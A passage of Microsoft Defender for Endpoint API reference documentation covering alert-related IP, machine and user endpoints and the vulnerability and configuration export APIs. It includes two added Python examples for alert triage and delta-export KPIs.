            "sha256": "dcd71ef5fff4362a9f64cf3f96f14f2b11d6f428f3badbedcb9ff3361e7079aa",
            "md5": "8d5b7cc9a832e21d22503057e1fec8e9",
            "globalPrevalence": 29,
            "globalFirstObserved": "2019-03-23T23:54:06.0135204Z",
            "globalLastObserved": "2019-04-23T00:43:20.0489831Z",
            "size": 113984,
            "fileType": null,
            "isPeFile": true,
            "filePublisher": "Microsoft Corporation",
            "fileProductName": "Microsoft© Windows© Operating System",
            "signer": "Microsoft Corporation",
            "issuer": "Microsoft Code Signing PCA",
            "signerHash": "9dc17888b5cfad98b3cb35c1994e96227f061675",
            "isValidCertificate": true,
            "determinationType": "Unknown",
            "determinationValue": null
        }
        ...
    ]
}


Get alert-related IPs' information API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves all IPs related to a specific alert.

Limitations
1. You can query on alerts last updated according to your configured retention
   period.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Ip.Read.All | 'Read IP address profiles'
Delegated (work or school account) | Ip.Read.All | 'Read IP address profiles'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data' (for
  more information, see Create and manage roles).
- The user needs to have access to the device associated with the alert, based
  on device group settings (for more information, see Create and manage
  device groups).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/alerts/{id}/ips

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and alert and an IP exist - 200 OK. If alert not found - 404 Not Found.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/alerts/636688558380765161_2136280442/ips

Response example
Here's an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/$metadata#Ips",
    "value": [
        {
            "id": "104.80.104.128"
        },
        {
            "id": "23.203.232.228"
        }
        ...
    ]
}


Get alert related machine information API
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves the device related to a specific alert.

Limitations
1. You can query on alerts last updated according to your configured retention
   period.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine information'
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.Read | 'Read machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data' (see
  Create and manage roles for more information).
- The user needs to have access to the device associated with the alert, based
  on device group settings (see Create and manage device groups for more
  information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/alerts/{id}/machine

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and alert and device exist - 200 OK. If alert not found or device not found -
404 Not Found.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/alerts/636688558380765161_2136280442/machine

Response example
Here is an example of the response. The osPlatform value is "Windows10" or
"Windows11", depending on the device.

JSON

{
    "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
    "computerDnsName": "mymachine1.contoso.com",
    "firstSeen": "2018-08-02T14:55:03.7791856Z",
    "lastSeen": "2021-01-25T07:27:36.052313Z",
    "osPlatform": "Windows10",
    "osProcessor": "x64",
    "version": "1901",
    "lastIpAddress": "10.166.113.46",
    "lastExternalIpAddress": "167.220.203.175",
    "osBuild": 19042,
    "healthStatus": "Active",
    "deviceValue": "Normal",
    "rbacGroupName": "The-A-Team",
    "riskScore": "Low",
    "exposureLevel": "Low",
    "aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
    "machineTags": [
        "Tag1",
        "Tag2"
    ],
    "ipAddresses": [
        {
            "ipAddress": "10.166.113.47",
            "macAddress": "8CEC4B897E73",
            "operationalStatus": "Up"
        },
        {
            "ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
            "macAddress": "8CEC4B897E73",
            "operationalStatus": "Up"
        }
    ]
}


Get alert related user information API
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves the user related to a specific alert.

Limitations
1. You can query on alerts last updated according to your configured retention
   period.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | User.Read.All | 'Read user profiles'
Delegated (work or school account) | User.Read.All | 'Read user profiles'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data' (see
  Create and manage roles for more information).
- The user needs to have access to the device associated with the alert, based
  on device group settings (see Create and manage device groups for more
  information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/alerts/{id}/user

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and alert and a user exist - 200 OK with the user in the body. If alert or user
not found - 404 Not Found.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/alerts/636688558380765161_2136280442/user

Response example
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Users/$entity",
    "id": "contoso\\user1",
    "accountName": "user1",
    "accountDomain": "contoso",
    "accountSid": "S-1-5-21-72051607-1745760036-109187956-93922",
    "firstSeen": "2019-12-08T06:33:39Z",
    "lastSeen": "2020-01-05T06:58:34Z",
    "mostPrevalentMachineId": "0111b647235c26159bec3e5eb6c8c3a0cc3ab766",
    "leastPrevalentMachineId": "0111b647235c26159bec3e5eb6c8c3a0cc3ab766",
    "logonTypes": "Network",
    "logOnMachinesCount": 1,
    "isDomainAdmin": false,
    "isOnlyNetworkUser": false
}
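The alert-related entity endpoints documented above (domains, files, IPs, machine, user) share one request shape: a bearer token, a GET on /api/alerts/{id}/{entity}, and a documented 200 or 404 outcome. The following Python client is an added example, not code from Microsoft's documentation or SDK. It fetches all five entities for one alert and builds a triage summary, flagging files whose certificate is not valid or whose determinationType is still "Unknown" (the fields shown in the files response above). The transport is injectable so the module runs offline; the responses at the bottom are constructed from the documented examples, and the token, the second file's determination value and the hashes are placeholders.

```python
"""Pull the entities linked to one Defender for Endpoint alert and build a triage summary.

Added example; not Microsoft's own client code. It calls the documented
GET /api/alerts/{id}/{domains|files|ips|machine|user} endpoints with a Bearer
token, handles the documented 200 / 404 outcomes, and takes an injectable
transport so it can run offline against constructed responses.
"""
import json
import urllib.error
import urllib.request

BASE_URL = "https://api.securitycenter.microsoft.com"  # swap for a regional host if preferred
ENTITIES = ("domains", "files", "ips", "machine", "user")


def http_transport(url, headers):
    """Real transport: returns (HTTP status, parsed JSON body or None)."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, json.loads(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, None


def get_alert_entity(alert_id, entity, token, transport=http_transport, base_url=BASE_URL):
    """Fetch one related-entity resource for an alert.

    Returns the parsed body on 200 and None on 404 (alert or entity not found).
    Any other status is raised: it is not an outcome the API documents.
    """
    if entity not in ENTITIES:
        raise ValueError(f"unsupported entity: {entity}")
    url = f"{base_url}/api/alerts/{alert_id}/{entity}"
    status, body = transport(url, {"Authorization": f"Bearer {token}"})
    if status == 200:
        return body
    if status == 404:
        return None
    raise RuntimeError(f"{entity}: unexpected HTTP {status}")


def triage_summary(alert_id, token, transport=http_transport):
    """Collect every related entity and mark the files an analyst should look at first."""
    summary = {"alertId": alert_id}
    for entity, key in (("domains", "host"), ("ips", "id")):
        body = get_alert_entity(alert_id, entity, token, transport)
        summary[entity] = [item[key] for item in body["value"]] if body else []
    files = get_alert_entity(alert_id, "files", token, transport)
    file_items = files["value"] if files else []
    summary["files"] = [f["sha256"] for f in file_items]
    # Files with an invalid certificate or with no verdict yet deserve a closer look.
    summary["filesToReview"] = [
        f["sha256"] for f in file_items
        if not f.get("isValidCertificate") or f.get("determinationType") == "Unknown"
    ]
    machine = get_alert_entity(alert_id, "machine", token, transport)
    summary["device"] = machine["computerDnsName"] if machine else None
    user = get_alert_entity(alert_id, "user", token, transport)
    summary["user"] = user["id"] if user else None
    return summary


# --- Constructed offline responses, modelled on the documented examples ---
ALERT_ID = "636688558380765161_2136280442"
FAKE_RESPONSES = {
    f"{BASE_URL}/api/alerts/{ALERT_ID}/domains": (200, {"value": [{"host": "www.example.com"}]}),
    f"{BASE_URL}/api/alerts/{ALERT_ID}/ips": (200, {"value": [{"id": "104.80.104.128"}]}),
    f"{BASE_URL}/api/alerts/{ALERT_ID}/files": (200, {"value": [
        {"sha256": "aa" * 32, "isValidCertificate": True, "determinationType": "Unknown"},
        # "constructed-verdict" is a placeholder, not a documented determinationType value
        {"sha256": "bb" * 32, "isValidCertificate": True, "determinationType": "constructed-verdict"},
    ]}),
    f"{BASE_URL}/api/alerts/{ALERT_ID}/machine": (200, {"computerDnsName": "mymachine1.contoso.com"}),
    f"{BASE_URL}/api/alerts/{ALERT_ID}/user": (404, None),  # alert has no associated user
}


def fake_transport(url, headers):
    """Offline stand-in for http_transport; also checks that the bearer header is sent."""
    assert headers["Authorization"].startswith("Bearer ")
    return FAKE_RESPONSES.get(url, (404, None))


if __name__ == "__main__":
    print(json.dumps(triage_summary(ALERT_ID, "placeholder-token", fake_transport), indent=2))
```

Replace `fake_transport` with the default `http_transport` and a real token to run it against the service; the 404 branch is what you hit when the alert has no user or device associated, so the summary treats that as "none" rather than as an error.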


Export assessment methods and properties per device
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

API description
Provides methods and property details about the APIs that pull vulnerability
management data on a per-device basis. There are different API calls to get different
types of data. In general, each API call contains the requisite data for devices in your
organization.

Note

Unless indicated otherwise, all export assessment methods listed are full export
and by device (also referred to as per device).

You can use the export assessment APIs to retrieve (export) different types of
information:

1. Export secure configurations assessment
2. Export software inventory assessment
3. Export software vulnerabilities assessment
4. Export non product code software inventory assessment

The APIs that correspond to each export information type are described in the
numbered sections below.

Each method has different API calls to get different types of data. Because the amount
of data can be large, there are two ways it can be retrieved:

- JSON response: The API pulls all data in your organization as JSON responses. This
  method is best for small organizations with fewer than 100K devices. The response is
  paginated, so you can use the @odata.nextLink field from the response to fetch
  the next results.

- Via files: This API solution enables pulling larger amounts of data faster and more
  reliably, so it's recommended for large organizations with more than 100K
  devices. This API pulls all data in your organization as download files. The response
  contains URLs to download all the data from Azure Storage. This API enables you
  to download all your data from Azure Storage as follows:
  1. Call the API to get a list of download URLs with all your organization data.
  2. Download all the files using the download URLs and process the data as you
     like.

Data that is collected using either method (JSON response or via files) is a snapshot of
the current state. It doesn't contain historic data. To collect historic data, customers must
save the data in their own data storage.

1. Export secure configurations assessment

Returns all of the configurations and their status, on a per-device basis.

1.1 Methods

Method: Export secure configuration assessment (JSON response)
Data type: Secure configuration by device collection. See: 1.2 Properties (JSON response)
Description: Returns a table with an entry for every unique combination of DeviceId,
ConfigurationId. The API pulls all data in your organization as JSON responses. This
method is best for small organizations with fewer than 100K devices. The response is
paginated, so you can use the @odata.nextLink field from the response to fetch the
next results.

Method: Export secure configuration assessment (via files)
Data type: Secure configuration by device collection. See: 1.3 Properties (via files)
Description: Returns a table with an entry for every unique combination of DeviceId,
ConfigurationId. This API solution enables pulling larger amounts of data faster and more
reliably, so it's recommended for large organizations with more than 100K devices. This
API pulls all data in your organization as download files. The response contains URLs to
download all the data from Azure Storage. This API enables you to download all your
data from Azure Storage as follows:
1. Call the API to get a list of download URLs with all your organization data.
2. Download all the files using the download URLs and process the data as you like.

1.2 Properties (JSON response)

configurationCategory (String): Category or grouping to which the configuration belongs: Application, OS, Network, Accounts, Security controls.
configurationId (String): Unique identifier for a specific configuration.
configurationImpact (String): Rated effect of the configuration on the overall configuration score (1-10).
configurationName (String): Display name of the configuration.
configurationSubcategory (String): Subcategory or subgrouping to which the configuration belongs. In many cases, specific capabilities or features.
deviceId (String): Unique identifier for the device in the service.
deviceName (String): Fully qualified domain name (FQDN) of the device.
isApplicable (Bool): Indicates whether the configuration or policy is applicable.
isCompliant (Bool): Indicates whether the configuration or policy is properly configured.
isExpectedUserImpact (Bool): Indicates whether the user is affected if the configuration is applied.
osPlatform (String): Platform of the operating system running on the device. Specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Supported operating systems, platforms and capabilities for details.
osVersion (String): Specific version of the operating system running on the device.
rbacGroupName (String): The role-based access control (RBAC) group. If the device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
rbacGroupId (String): The role-based access control (RBAC) group ID.
recommendationReference (String): A reference to the recommendation ID related to the software.
timestamp (String): Last time the configuration was seen on the device.

1.3 Properties (via files)

Export files (array[string]): A list of download URLs for files holding the current snapshot of the organization.
GeneratedTime (String): The time that the export was generated.

2. Export software inventory assessment

Returns all of the installed software and their details on each device.

2.1 Methods

Method: Export software inventory assessment (JSON response)
Data type: Software inventory by device collection. See: 2.2 Properties (JSON response)
Description: Returns a table with an entry for every unique combination of DeviceId,
SoftwareVendor, SoftwareName, SoftwareVersion. The API pulls all data in your
organization as JSON responses. This method is best for small organizations with fewer
than 100K devices. The response is paginated, so you can use the @odata.nextLink field
from the response to fetch the next results.

Method: Export software inventory assessment (via files)
Data type: Software inventory by device files. See: 2.3 Properties (via files)
Description: Returns a table with an entry for every unique combination of DeviceId,
SoftwareVendor, SoftwareName, SoftwareVersion. This API solution enables pulling larger
amounts of data faster and more reliably, so it's recommended for large organizations
with more than 100K devices. This API pulls all data in your organization as download
files. The response contains URLs to download all the data from Azure Storage. This API
enables you to download data from Azure Storage as follows:
1. Call the API to get a list of download URLs with your organization data.
2. Download the files using the download URLs and process the data as you like.

2.2 Properties (JSON response)

DeviceId (String): Unique identifier for the device in the service.
DeviceName (String): Fully qualified domain name (FQDN) of the device.
DiskPaths (Array[string]): Disk evidence that the product is installed on the device.
EndOfSupportDate (String): The date on which support for this software has ended or will end.
EndOfSupportStatus (String): End of support status. Can contain these possible values: None, EOS Version, Upcoming EOS Version, EOS Software, Upcoming EOS Software.
NumberOfWeaknesses (Int): Number of weaknesses on this software on this device.
OSPlatform (String): Platform of the operating system running on the device; specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Supported operating systems, platforms and capabilities for details.
RbacGroupName (String): The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
rbacGroupId (String): The role-based access control (RBAC) group ID.
RegistryPaths (Array[string]): Registry evidence that the product is installed on the device.
SoftwareFirstSeenTimestamp (String): The first time this software was seen on the device.
SoftwareName (String): Name of the software product.
SoftwareVendor (String): Name of the software vendor.
SoftwareVersion (String): Version number of the software product.

2.3 Properties (via files)

Export files (array[string]): A list of download URLs for files holding the current snapshot of the organization.
GeneratedTime (String): The time that the export was generated.

3. Export software vulnerabilities assessment

Returns all the known vulnerabilities on a device and their details, for all devices.

3.1 Methods

Method: Export software vulnerabilities assessment (JSON response)
Data type: Investigation collection. See: 3.2 Properties (JSON response)
Description: Returns a table with an entry for every unique combination of DeviceId,
SoftwareVendor, SoftwareName, SoftwareVersion, CveId. The API pulls all data in your
organization as JSON responses. This method is best for small organizations with fewer
than 100K devices. The response is paginated, so you can use the @odata.nextLink field
from the response to fetch the next results.

Method: Export software vulnerabilities assessment (via files)
Data type: Investigation entity. See: 3.3 Properties (via files)
Description: Returns a table with an entry for every unique combination of DeviceId,
SoftwareVendor, SoftwareName, SoftwareVersion, CveId. This API solution enables
pulling larger amounts of data faster and more reliably, so it's recommended for large
organizations with more than 100K devices. This API pulls all data in your organization as
download files. The response contains URLs to download all the data from Azure Storage.
This API enables you to download all your data from Azure Storage as follows:
1. Call the API to get a list of download URLs with all your organization data.
2. Download all the files using the download URLs and process the data as you like.

Method: Delta export software vulnerabilities assessment (JSON response)
Data type: Investigation collection. See: 3.4 Properties (delta export JSON response)
Description: Returns a table with an entry for every unique combination of DeviceId,
SoftwareVendor, SoftwareName, SoftwareVersion, CveId, and EventTimestamp. The API
pulls data in your organization as JSON responses. The response is paginated, so you can
use the @odata.nextLink field from the response to fetch the next results. The full
software vulnerabilities assessment (JSON response) is used to obtain an entire snapshot
of the software vulnerabilities assessment of your organization by device. The delta
export API call, however, fetches only the changes that have happened between a
selected date and the current date (the "delta" API call). Instead of getting a full export
with a large amount of data every time, you get only specific information on new, fixed,
and updated vulnerabilities. The delta export API call can also be used to calculate KPIs
such as "how many vulnerabilities were fixed?" or "how many new vulnerabilities were
added to my organization?" Because the delta export API call for software vulnerabilities
returns data for only a targeted date range, it isn't considered a full export.
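The delta export row above says the call returns only New, Fixed and Updated events for a date range and that those events can be turned into KPIs. The following Python module is an added example, not Microsoft's code, that does exactly that on records shaped like section 3.4 (Status, CveId, DeviceId, VulnerabilitySeverityLevel, EventTimestamp): it counts fixed and new vulnerabilities by severity, keeps records with an undocumented Status visible instead of dropping them, and replays events in timestamp order so a finding that appeared and was remediated inside the same window is not reported as still open. The records at the bottom are constructed; the CVE IDs, device IDs and the "Reopened" status are placeholders, not real identifiers or documented values.

```python
"""Compute KPIs from a delta export of software vulnerabilities.

Added example, not Microsoft's code. Consumes records shaped like section 3.4 of
the export assessment documentation (Status of New / Fixed / Updated, plus CveId,
DeviceId, VulnerabilitySeverityLevel and EventTimestamp). The sample records are
constructed; CVE and device IDs are placeholders.
"""
from collections import Counter

KNOWN_STATUSES = ("New", "Fixed", "Updated")  # the three values section 3.4 documents


def delta_kpis(records):
    """Count delta events per Status, overall and by VulnerabilitySeverityLevel.

    Records whose Status is outside the documented values are not counted; their
    Ids are returned so the caller can investigate rather than lose them silently.
    """
    by_severity = {status: Counter() for status in KNOWN_STATUSES}
    unrecognised = []
    for rec in records:
        status = rec.get("Status")
        if status not in by_severity:
            unrecognised.append(rec.get("Id"))
            continue
        by_severity[status][rec.get("VulnerabilitySeverityLevel", "Unknown")] += 1
    return {
        "totals": {status: sum(c.values()) for status, c in by_severity.items()},
        "bySeverity": {status: dict(c) for status, c in by_severity.items()},
        "unrecognisedStatus": unrecognised,
    }


def open_new_findings(records):
    """(DeviceId, CveId) pairs reported New in the window and not Fixed afterwards.

    Events are replayed in EventTimestamp order, so a later Fixed cancels an earlier
    New for the same pair; Updated events change details, not open/closed state.
    """
    is_open = {}
    for rec in sorted(records, key=lambda r: r["EventTimestamp"]):
        key = (rec["DeviceId"], rec["CveId"])
        if rec["Status"] == "New":
            is_open[key] = True
        elif rec["Status"] == "Fixed":
            is_open[key] = False
    return sorted(key for key, still_open in is_open.items() if still_open)


# --- Constructed delta records (placeholder IDs, not real CVEs or devices) ---
def _event(eid, device, cve, status, severity, ts):
    return {"Id": eid, "DeviceId": device, "CveId": cve, "Status": status,
            "VulnerabilitySeverityLevel": severity, "EventTimestamp": ts}


SAMPLE_DELTA = [
    _event("e1", "dev-1", "CVE-0000-0001", "New", "High", "2024-01-02T08:00:00Z"),
    _event("e2", "dev-1", "CVE-0000-0001", "Fixed", "High", "2024-01-03T09:30:00Z"),
    _event("e3", "dev-2", "CVE-0000-0002", "New", "Critical", "2024-01-03T10:00:00Z"),
    _event("e4", "dev-2", "CVE-0000-0003", "Updated", "Medium", "2024-01-04T11:00:00Z"),
    _event("e5", "dev-3", "CVE-0000-0004", "Fixed", "Low", "2024-01-05T12:00:00Z"),
    # "Reopened" is a constructed, undocumented status used to exercise the error path
    _event("e6", "dev-3", "CVE-0000-0005", "Reopened", "Low", "2024-01-05T13:00:00Z"),
]


if __name__ == "__main__":
    import json
    print(json.dumps(delta_kpis(SAMPLE_DELTA), indent=2))
    print(open_new_findings(SAMPLE_DELTA))
```

Feed it the "value" array of each delta page (after following @odata.nextLink) to get the window's KPIs; the open-findings list is the set of device/CVE pairs worth raising with the owning teams.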

3.2 Properties (JSON response)

CveId (String): Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system.
CvssScore (String): The CVSS score of the CVE.
DeviceId (String): Unique identifier for the device in the service.
DeviceName (String): Fully qualified domain name (FQDN) of the device.
DiskPaths (Array[string]): Disk evidence that the product is installed on the device.
ExploitabilityLevel (String): The exploitability level of this vulnerability (NoExploit, ExploitIsPublic, ExploitIsVerified, ExploitIsInKit).
FirstSeenTimestamp (String): First time the CVE of this product was seen on the device.
Id (String): Unique identifier for the record.
LastSeenTimestamp (String): Last time the CVE was seen on the device.
OSPlatform (String): Platform of the operating system running on the device; specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Supported operating systems, platforms and capabilities for details.
RbacGroupName (String): The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
rbacGroupId (String): The role-based access control (RBAC) group ID.
RecommendationReference (String): A reference to the recommendation ID related to this software.
RecommendedSecurityUpdate (String): Name or description of the security update provided by the software vendor to address the vulnerability.
RecommendedSecurityUpdateId (String): Identifier of the applicable security updates or identifier for the corresponding guidance or knowledge base (KB) articles.
RegistryPaths (Array[string]): Registry evidence that the product is installed on the device.
SecurityUpdateAvailable (Boolean): Indicates whether a security update is available for the software.
SoftwareName (String): Name of the software product.
SoftwareVendor (String): Name of the software vendor.
SoftwareVersion (String): Version number of the software product.
VulnerabilitySeverityLevel (String): Severity level that is assigned to the security vulnerability based on the CVSS score.

3.3 Properties (via files)

Export files (array[string]): A list of download URLs for files holding the current snapshot of the organization.
GeneratedTime (String): The time that the export was generated.

3.4 Properties (delta export JSON response)

CveId (String): Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system.
CvssScore (String): The CVSS score of the CVE.
DeviceId (String): Unique identifier for the device in the service.
DeviceName (String): Fully qualified domain name (FQDN) of the device.
DiskPaths (Array[string]): Disk evidence that the product is installed on the device.
EventTimestamp (String): The time the delta event was found.
ExploitabilityLevel (String): The exploitability level of the vulnerability (NoExploit, ExploitIsPublic, ExploitIsVerified, ExploitIsInKit).
FirstSeenTimestamp (String): First time the CVE of the product was seen on the device.
Id (String): Unique identifier for the record.
LastSeenTimestamp (String): Last time the CVE was seen on the device.
OSPlatform (String): Platform of the operating system running on the device; specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Supported operating systems, platforms and capabilities for details.
RbacGroupName (String): The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
RecommendationReference (String): A reference to the recommendation ID related to this software.
RecommendedSecurityUpdate (String): Name or description of the security update provided by the software vendor to address the vulnerability.
RecommendedSecurityUpdateId (String): Identifier of the applicable security updates or identifier for the corresponding guidance or knowledge base (KB) articles.
RegistryPaths (Array[string]): Registry evidence that the product is installed on the device.
SoftwareName (String): Name of the software product.
SoftwareVendor (String): Name of the software vendor.
SoftwareVersion (String): Version number of the software product.
Status (String): New (for a new vulnerability introduced on a device). Fixed (for a vulnerability that no longer exists on the device, which means it was remediated). Updated (for a vulnerability on a device that has changed. The possible changes are: CVSS score, exploitability level, severity level, DiskPaths, RegistryPaths, RecommendedSecurityUpdate).
VulnerabilitySeverityLevel (String): Severity level assigned to the security vulnerability based on the CVSS score.

4. Export non product code software inventory assessment

Returns all of the installed software that does not have a Common Platform
Enumeration (CPE), and their details, on each device.

4.1 Methods

Method: Export non product code software inventory assessment (JSON response)
Data type: Non product code software inventory by device collection. See: 4.2 Properties (JSON response)
Description: Returns a table with an entry for every unique combination of DeviceId,
SoftwareVendor, SoftwareName, SoftwareVersion. The API pulls all data in your
organization as JSON responses. This method is best for small organizations with fewer
than 100K devices. The response is paginated, so you can use the @odata.nextLink field
from the response to fetch the next results.

Method: Export non product code software inventory assessment (via files)
Data type: Non product code software inventory by device files. See: 4.3 Properties (via files)
Description: Returns a table with an entry for every unique combination of DeviceId,
SoftwareVendor, SoftwareName, SoftwareVersion. This API solution enables pulling larger
amounts of data faster and more reliably, so it's recommended for large organizations
with more than 100K devices. This API pulls all data in your organization as download
files. The response contains URLs to download all the data from Azure Storage. This API
enables you to download data from Azure Storage as follows:
1. Call the API to get a list of download URLs with your organization data.
2. Download the files using the download URLs and process the data as you like.

4.2 Properties (JSON response)

DeviceId (string): Unique identifier for the device in the service.
DeviceName (string): Fully qualified domain name (FQDN) of the device.
OSPlatform (string): Platform of the operating system running on the device. These are specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Supported operating systems, platforms and capabilities for details.
RbacGroupName (string): The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
RbacGroupId (string): The role-based access control (RBAC) group ID.
SoftwareLastSeenTimestamp (string): The last time this software was seen on the device.
SoftwareName (string): Name of the software product.
SoftwareVendor (string): Name of the software vendor.
SoftwareVersion (string): Version number of the software product.

4.3 Properties (via files)

Export files (array[string]): A list of download URLs for files holding the current snapshot of the organization.
GeneratedTime (String): The time that the export was generated.

See also
- Export secure configuration assessment per device
- Export software inventory assessment per device
- Export software vulnerabilities assessment per device
- Export non cpe software inventory assessment per device

Other related
- Microsoft Defender Vulnerability Management
- Vulnerabilities in your organization



Export secure configuration assessment per device
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Returns all of the configurations and their status, on a per-device basis.

There are different API calls to get different types of data. Because the amount of data
can be large, there are two ways it can be retrieved:

- Export secure configuration assessment JSON response: The API pulls all data in
  your organization as JSON responses. This method is best for small organizations
  with fewer than 100K devices. The response is paginated, so you can use the
  @odata.nextLink field from the response to fetch the next results.

- Export secure configuration assessment via files: This API solution enables pulling
  larger amounts of data faster and more reliably. Therefore, it is recommended for
  large organizations with more than 100K devices. This API pulls all data in your
  organization as download files. The response contains URLs to download all the
  data from Azure Storage. This API enables you to download all your data from
  Azure Storage as follows:
  1. Call the API to get a list of download URLs with all your organization data.
  2. Download all the files using the download URLs and process the data as you
     like.

Data that is collected (using either JSON response or via files) is a snapshot of the
current state and does not contain historic data. In order to collect historic data,
customers must save the data in their own data storage.

Note

Unless indicated otherwise, all export assessment methods listed are full export
and by device (also referred to as per device).

1. Export secure configuration assessment (JSON response)

1.1 API method description

This API response contains the Secure Configuration Assessment on your exposed devices, and returns an entry for every unique combination of DeviceId, ConfigurationId.

1.1.1 Limitations

Maximum page size is 200,000.

Rate limitations for this API are 30 calls per minute and 1000 calls per hour.

1.2 Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management vulnerability information'

1.3 URL
HTTP

GET /api/machines/SecureConfigurationsAssessmentByMachine

1.4 Parameters
pageSize (default = 50,000): Number of results in response.
$top: Number of results to return (doesn't return @odata.nextLink and therefore
doesn't pull all the data).

1.5 Properties

Note
The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
Some additional columns might be returned in the response. These columns are temporary and might be removed; please use only the documented columns.

Property (ID) | Data type | Description | Example of a returned value
ConfigurationCategory | string | Category or grouping to which the configuration belongs: Application, OS, Network, Accounts, Security controls | Security controls
ConfigurationId | string | Unique identifier for a specific configuration | scid-10000
ConfigurationImpact | string | Rated impact of the configuration to the overall configuration score (1-10) | 9
ConfigurationName | string | Display name of the configuration | Onboard devices to Microsoft Defender for Endpoint
ConfigurationSubcategory | string | Subcategory or subgrouping to which the configuration belongs. In many cases, this describes specific capabilities or features. | Onboard Devices
DeviceId | string | Unique identifier for the device in the service. | 9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1
DeviceName | string | Fully qualified domain name (FQDN) of the device. | johnlaptop.europe.contoso.com
IsApplicable | bool | Indicates whether the configuration or policy is applicable | true
IsCompliant | bool | Indicates whether the configuration or policy is properly configured | false
